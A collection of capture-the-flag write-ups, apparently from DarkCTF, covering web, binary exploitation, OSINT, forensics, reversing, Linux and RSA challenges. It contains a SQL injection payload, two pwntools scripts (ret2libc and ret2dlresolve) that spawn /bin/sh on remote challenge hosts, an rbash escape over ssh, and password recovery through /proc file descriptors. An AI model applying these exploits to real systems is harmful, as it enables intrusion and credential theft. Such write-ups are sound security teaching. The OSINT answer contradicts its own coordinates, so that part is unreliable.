Briefing:

Try to find username and password. Webiste: http://simplesql.darkarmy.xyz/.

In the source we see the comment <!-- Try id as parameter -->.

Injecting a simple ?id=1 or 2=2 gives us the response Username : LOL Password : Try.

Trying ?id=2 or 2=2 gives us a difference response, Username : Try Password : another, so I tried a few more till at http://simplesql.darkarmy.xyz/?id=9%20or%202=2 you get the flag.

Flag:

darkCTF{it_is_very_easy_to_find}

Briefing:

This is from the back Solar Designer times where you require rope to climb and get anything you want.

nc pwn.darkarmy.xyz 5002

from pwn import *

elf = context.binary = ELF('./roprop', checksec=False)
if args.REMOTE:
    libc = ELF('./libc-remote.so')
    p = remote('roprop.darkarmy.xyz', 5002)
else:
    libc = elf.libc
    p = process()


p.recvuntil('s.\n\n')

rop = ROP(elf)
rop.raw('A' * 88)
rop.puts(elf.got['puts'])
rop.raw(elf.sym['main'])

p.sendline(rop.chain())

leak = u64(p.recv(6) + b'\x00\x00')
log.success(f'Leak: {hex(leak)}')


p.recvlines(2)

libc.address = leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

# ret2libc
rop = ROP(libc)
rop.raw('A' * 88)
rop.execve(next(libc.search(b'/bin/sh\x00')), 0, 0)

p.sendline(rop.chain())
p.interactive()

So firstly, after seeing what they have said about the eNB ID, MCC, and MNC, I decided to look up what they meant, so :

• eNB ID : used to identify an EnodeB uniquely

• MCC : mobile country code

• MNC : mobile network code

You can distinguish which one is which by knowing that the MCC and MNC are both 3 digits so 81097 must be the eNB ID

We can use the MCC and MNC to find out that the cell tower is in the US, and that its provider is AT&T. Now we need to triangulate the cell tower so after a bit of googling I found a website called cellmapper.net, where you can specify the eNB ID, MNC and MCC, so finally you get the latlong coordinates by clicking on the location, which are 32.8464489 and -24.554806.

Flag:

Because we know that the briefing says the format is darkCTF{latitude, longtitude} to 1 decimal place we know that the flag is DarkCTF{38.4, 24.5}

Briefing:

0xDarkArmy has 1 social account and DarkArmy uses the same name everywhere. Hint: The front page of internet

First off, running python3 sherlock 0xDarkArmy gives us hits on reddit, instagram and twitter, among others.

While nothing interesting was found on the twitter or instagram, there was a qr code posted on the reddit page, seen here

Scanning the qr code, we are directed to a .onion site, openable in tor. see

At a first look it seems like a static template page. However navigating to /robots.txt we get half of the flag: darkctf{S0c1a1_D04k_

Opening up developer tools and going to the 'networks' tab, we can see that in the get request to the page, there is a custom HTTP header Flag: under Date. This contains the second half of the flag: _w3b_051n7}

Flag:

darkctf{S0c1a1_D04k_w3b_051n7}

Briefing:

taking small Bites of Bytes File

looks hard to reverse, but really it just checks a funtion's output

• Put a break on both checks

• set the value of eax to 0 to pass them

• get the flag

Flag:

darkCTF{4rgum3nts_are_v3ry_1mp0rt4nt!!!}

Permalink

Briefing:

"Hello, hello, Can you hear me, as I scream your Flag! " file

Opening the file in sonic visualiser, you can see two audio streams. Seaparete the streams and then add a spectogram layer. Play around with the colour settings to see the flag more clearly.

Flag:

darkCTF{1_l0v3_5p3ctr3_fr0m_4l4n}

Permalink

Briefing:

Wolfie getting free games from somewhere. Find the full url to that game. Note: Use the same file provided in Wolfie's Contacts Flag Format: darkCTF{http://site} file

Using the same file from Wolfie's contacts, I searched for the string http:// in autopsy.

There were a few results but one was a .zip so I assumed this was the game.

Flag:

darkCTF{http://aries.dccircle34.com/realitydownloadgo/c4d37739ca3dc3ed2d4852395d5ed228/784b4647446e334c58556e5473326556422e624f612e51432e4a6472/2019/07/31/PencakSilat2_1.zip}

Permalink

As the name suggests, it's XOR.

We know the plaintext starts with darkCTF{ so using this as the key as so you'll get the actual key outputted- see here

Therefore using the key 1337hack gives us the flag- see here

Flag:

darkCTF{kud0s_h4xx0r}

Briefing:

Don't Try to break this jail. ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 password : wolfie

Sshing in and running echo $SHELL shows us we have an rbash shell- that is, a restricted shell.

Googling how to bypass this I found you could add 'bash --noprofile' to the end of the ssh command.

So running ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 'bash --noprofile' gives us an unrestricted shell. From there, just cd imp and cat flag.txt to get the flag.

Flag:

darkCTF{h0pe_y0u_used_intended_w4y}

Briefing:

Even though Solar Designer gave you his times technique, you have to resolve(sort-out) yourself and go deeper. This time rope willn't let you have anything you want but you have to make a fake rope and get everything.
nc pwn.darkarmy.xyz 5001

super basic ret2dlresolve exploit

from pwn import *

elf = context.binary = ELF('./newPaX', checksec=False)

if args.REMOTE:
    p = remote('newpax.darkarmy.xyz', 5001)
else:
    p = process()
rop = ROP(elf)

# obviously a ret2dlresolve
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 52)
rop.read(0, dlresolve.data_addr, 100)
rop.ret2dlresolve(dlresolve)

p.sendline(rop.chain())

p.sendline(dlresolve.payload)                # now the read is called and we pass all the relevant structures in

p.interactive()

Briefing:

Mr.Wolf was doing some work and he accidentally deleted the important file can you help him and read the file? ssh ctf@findme.darkarmy.xyz -p 10000 password: wolfie

Running ps aux to see the running processes showed us that the command tail -f /home/wolf1/pass was running at PID 10. However in the /home/wolf1 directory, this file was not to be found.

After googling how to view the contents of a background process I ran the command cat /proc/10/fd/* and got mysecondpassword123.

Since there was a wolf2 directory I figured this was the password for wolf2, so running su wolf2 and inputting this as the password means we are now wolf2. List the files and get the flag.

Flag:

darkCTF{w0ahh_n1c3_w0rk!!!}

Permalink

Briefing:

Wolfie is doing some illegal work with his friends find his contacts. File

• Opening the file in autopsy, we can see some emails. In the headings of some, you could see parts of the flag.

• Alternatively, this challenge could be done by opening the file in mousepad and ctrl + F searching for 'darkctf{'

Flag:

darkCTF{C0ntacts_4re_1mp0rtant}

Yes, we cheesed it.

python3 RsaCtfTool.py -n 0x3b7c97ceb5f01f8d2095578d561cad0f22bf0e9c94eb35a9c41028247a201a6db95f -e 0x10001 --uncipher 0x1B5358AD42B79E0471A9A8C84F5F8B947BA9CB996FA37B044F81E400F883A309B886 --private

Flag:

darkCTF{4v0iD_us1ngg_p1_pr1mes}